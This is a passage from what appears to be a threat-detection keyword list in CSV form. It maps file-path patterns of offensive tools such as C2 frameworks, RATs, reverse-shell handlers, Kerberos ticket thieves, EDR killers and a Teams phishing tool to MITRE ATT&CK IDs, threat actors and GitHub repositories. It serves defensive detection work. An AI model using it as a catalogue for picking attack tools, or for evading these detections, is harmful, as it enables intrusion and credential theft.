Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"*/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/t3l3machus/Villain*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*/taidoor.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/TakeMyRDP*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*/Talon.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Talon/*Agent/Source*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/target:exe spacerunner.cs*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*/targetedKerberoast*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" +"*/targetedKerberoast.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/targets-asn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-map4to6.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-multicast-echo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-multicast-invalid-dst.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-multicast-mld.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-multicast-slaac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-wordlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-sniffer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Tash.dll*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/TashClient.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/TashLoader.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/tccbypass.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/tcpshell.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/Teamphisher.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/Teamphisher/targets.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/teams_localdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/teamserver-linux.tar.gz*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/teamserver-win.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/teamspeak2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/teamstracker.db*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.git*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/TelegramRAT.git*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*/telnet_cdata_ftth_backdoor_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/telnet-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/telnet-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/telnet-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/terminate/Terminator.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*/test32.dll*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*/test64.dll*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*/tests/NIST_CAVS/*.rsp*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/tests/test-bof.ps1*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/tevora-threat/PowerView*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*/tftp-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/TGSThief.git*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*/TGSThief/*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*/tgtParse.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/tgtParse/tgtParse.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/thc-hydra/*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which 